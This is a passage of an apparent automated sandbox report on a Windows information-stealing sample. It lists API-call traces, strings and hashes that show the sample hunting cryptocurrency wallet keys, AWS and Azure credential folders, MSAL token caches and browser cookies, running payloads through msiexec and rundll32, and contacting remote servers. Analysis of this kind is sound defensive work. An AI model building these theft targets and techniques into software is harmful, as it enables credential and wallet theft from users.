                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 857e234d909ea094b2f51881e059bd1289d1ae987c2083362fa034a919582213
                              • Instruction ID: 903bf96ff6a049547433e21ddedcd04e807c11d39354056612a94a74e78761db
                              • Opcode Fuzzy Hash: 857e234d909ea094b2f51881e059bd1289d1ae987c2083362fa034a919582213
                              • Instruction Fuzzy Hash: 7F122371920128ABCB18EBA4ECA5FEEB379FF54710F404599F506B6191DF302A89CF52
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0081D083
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081D1C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0081D1CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D308
                              • lstrcat.KERNEL32(?,00831570), ref: 0081D317
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D32A
                              • lstrcat.KERNEL32(?,00831574), ref: 0081D339
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D34C
                              • lstrcat.KERNEL32(?,00831578), ref: 0081D35B
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D36E
                              • lstrcat.KERNEL32(?,0083157C), ref: 0081D37D
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D390
                              • lstrcat.KERNEL32(?,00831580), ref: 0081D39F
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D3B2
                              • lstrcat.KERNEL32(?,00831584), ref: 0081D3C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0081D3D4
                              • lstrcat.KERNEL32(?,00831588), ref: 0081D3E3
                                • Part of subcall function 0082AB30: lstrlen.KERNEL32(00814F55,?,?,00814F55,00830DDF), ref: 0082AB3B
                                • Part of subcall function 0082AB30: lstrcpy.KERNEL32(00830DDF,00000000), ref: 0082AB95
                              • lstrlen.KERNEL32(?), ref: 0081D42A
                              • lstrlen.KERNEL32(?), ref: 0081D439
                                • Part of subcall function 0082AD80: StrCmpCA.SHLWAPI(00000000,00831568,0081D2A2,00831568,00000000), ref: 0082AD9F
                              • DeleteFileA.KERNEL32(00000000), ref: 0081D4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: e3fbdb813c2cb3b5c3d94225df57b908a6898cc5ed2e79048a139578bfaac3f8
                              • Instruction ID: 7607b3575f954e18ca12e940e9fc650d6cc8ee515a5f3bb1eaf463c79c560764
                              • Opcode Fuzzy Hash: e3fbdb813c2cb3b5c3d94225df57b908a6898cc5ed2e79048a139578bfaac3f8
                              • Instruction Fuzzy Hash: B5E14E71910118ABCB08EBE8ED96EEE7339FF54301F404558F507F61A1DE35AA89CB62
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015FCE38,00000000,?,00831544,00000000,?,?), ref: 0081CB6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0081CB89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0081CB95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0081CBA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0081CBD9
                              • StrStrA.SHLWAPI(?,015FCF70,00830B56), ref: 0081CBF7
                              • StrStrA.SHLWAPI(00000000,015FCE80), ref: 0081CC1E
                              • StrStrA.SHLWAPI(?,015FD098,00000000,?,00831550,00000000,?,00000000,00000000,?,015F8A40,00000000,?,0083154C,00000000,?), ref: 0081CDA2
                              • StrStrA.SHLWAPI(00000000,015FD3D8), ref: 0081CDB9
                                • Part of subcall function 0081C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0081C971
                                • Part of subcall function 0081C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0081C97C
                              • StrStrA.SHLWAPI(?,015FD3D8,00000000,?,00831554,00000000,?,00000000,015F8A50), ref: 0081CE5A
                              • StrStrA.SHLWAPI(00000000,015F89E0), ref: 0081CE71
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B47), ref: 0081CA43
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B4B), ref: 0081CA57
                                • Part of subcall function 0081C920: lstrcat.KERNEL32(?,00830B4E), ref: 0081CA78
                              • lstrlen.KERNEL32(00000000), ref: 0081CF44
                              • CloseHandle.KERNEL32(00000000), ref: 0081CF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: daf0155fa7adc08e2562feeceb39f77ec7b676fec42e401476e2e3604623ab7b
                              • Instruction ID: cff9cf653ca771f0fc6af06f0b908798ac1342e7d1a219af9b8b746c7d1e0585
                              • Opcode Fuzzy Hash: daf0155fa7adc08e2562feeceb39f77ec7b676fec42e401476e2e3604623ab7b
                              • Instruction Fuzzy Hash: 9BE1CD71910118ABCB18EBA8ECA6FEEB779FF54310F004559F506B7191DF306A89CB62
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • RegOpenKeyExA.ADVAPI32(00000000,015FACC0,00000000,00020019,00000000,008305BE), ref: 00828534
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008285B6
                              • wsprintfA.USER32 ref: 008285E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0082860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0082861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828629
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d12bfa3650637f5f2f76dc19341f0c5e1c4d4221d9f4932b60bcecf86c843f50
                              • Instruction ID: 767e2b559dad9e6a9335c7eecd127afc7b7280c4b8f82eae17b194fe609d0c7a
                              • Opcode Fuzzy Hash: d12bfa3650637f5f2f76dc19341f0c5e1c4d4221d9f4932b60bcecf86c843f50
                              • Instruction Fuzzy Hash: C9811A71911128ABDB28DB94DD95FEAB7B8FF48310F1086D8E109A6180DF746BC5CFA1
                              APIs
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 00825000
                              • lstrcat.KERNEL32(?,\.azure\), ref: 0082501D
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824B7C
                                • Part of subcall function 00824B60: FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                              • lstrcat.KERNEL32(?,00000000), ref: 0082508C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 008250A9
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                                • Part of subcall function 00824B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                                • Part of subcall function 00824B60: FindClose.KERNEL32(000000FF), ref: 00824DE2
                              • lstrcat.KERNEL32(?,00000000), ref: 00825118
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00825135
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824C00
                                • Part of subcall function 00824B60: StrCmpCA.SHLWAPI(?,008308D3), ref: 00824C15
                                • Part of subcall function 00824B60: wsprintfA.USER32 ref: 00824C32
                                • Part of subcall function 00824B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00824C6E
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,015FE4C0), ref: 00824C9A
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,00830FE0), ref: 00824CAC
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,?), ref: 00824CC0
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,00830FE4), ref: 00824CD2
                                • Part of subcall function 00824B60: lstrcat.KERNEL32(?,?), ref: 00824CE6
                                • Part of subcall function 00824B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00824CFC
                                • Part of subcall function 00824B60: DeleteFileA.KERNEL32(?), ref: 00824D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 6008447a39404a8516d0044cbd0db74d05eb3f85f579c159002fc300513a48ce
                              • Instruction ID: 999ef2264c42a2e87c0183531b84f53a1a4ecf8f453208e9f066ca551e849e5d
                              • Opcode Fuzzy Hash: 6008447a39404a8516d0044cbd0db74d05eb3f85f579c159002fc300513a48ce
                              • Instruction Fuzzy Hash: 3841A3BA94021867DF14E770EC9BFED7328EB94700F404554B659E51C1EEB857C88B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008291FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: b2f4b3606ed151d4c4538c5d1b50bd8f955cbb5f214dc6b5c8112be45d250f6c
                              • Instruction ID: 5e32c1b0ffb44260adf8f0142dc6ddd5776e453f0a3824b5f35ce0d79f9e7c31
                              • Opcode Fuzzy Hash: b2f4b3606ed151d4c4538c5d1b50bd8f955cbb5f214dc6b5c8112be45d250f6c
                              • Instruction Fuzzy Hash: 3871CA71910258ABDB14DBE8EC89FEEB779FF48700F108508F616EB290DB34A945CB61
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00823415
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008235AD
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0082373A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 0d8f286ed29af16048799fb5522fb99107ede6722bc26f897ff2f363d1685de1
                              • Instruction ID: 07438b001115408bb06890d976322197a7eb8c2cb8d2b0c45e11780a43a7017c
                              • Opcode Fuzzy Hash: 0d8f286ed29af16048799fb5522fb99107ede6722bc26f897ff2f363d1685de1
                              • Instruction Fuzzy Hash: 7A12F0B19101289BCB18EB94EDA2FEDB739FF14310F404599E506B6191EF346B89CF62
                              APIs
                                • Part of subcall function 00819A50: InternetOpenA.WININET(00830AF6,00000001,00000000,00000000,00000000), ref: 00819A6A
                              • lstrcat.KERNEL32(?,cookies), ref: 00819CAF
                              • lstrcat.KERNEL32(?,008312C4), ref: 00819CC1
                              • lstrcat.KERNEL32(?,?), ref: 00819CD5
                              • lstrcat.KERNEL32(?,008312C8), ref: 00819CE7
                              • lstrcat.KERNEL32(?,?), ref: 00819CFB
                              • lstrcat.KERNEL32(?,.txt), ref: 00819D0D
                              • lstrlen.KERNEL32(00000000), ref: 00819D17
                              • lstrlen.KERNEL32(00000000), ref: 00819D26
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 3174675846-3542011879
                              • Opcode ID: edfbae18a3ce30ce07d68f427c617d14bf0dd84defe00608991f72c53fa987e3
                              • Instruction ID: 349dd7899174d77ddd792d6eaf892cb484932f498daa5674e0f5c3687daf4d0d
                              • Opcode Fuzzy Hash: edfbae18a3ce30ce07d68f427c617d14bf0dd84defe00608991f72c53fa987e3
                              • Instruction Fuzzy Hash: 70512DB1900518ABCB14EBE4DC9AFEE7338FF44701F404558E216E7191EB755A89CF62
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 008162D0: InternetOpenA.WININET(00830DFF,00000001,00000000,00000000,00000000), ref: 00816331
                                • Part of subcall function 008162D0: StrCmpCA.SHLWAPI(?,015FE430), ref: 00816353
                                • Part of subcall function 008162D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00816385
                                • Part of subcall function 008162D0: HttpOpenRequestA.WININET(00000000,GET,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 008163D5
                                • Part of subcall function 008162D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0081640F
                                • Part of subcall function 008162D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00816421
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00825568
                              • lstrlen.KERNEL32(00000000), ref: 0082557F
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 008255B4
                              • lstrlen.KERNEL32(00000000), ref: 008255D3
                              • lstrlen.KERNEL32(00000000), ref: 008255FE
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                               • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
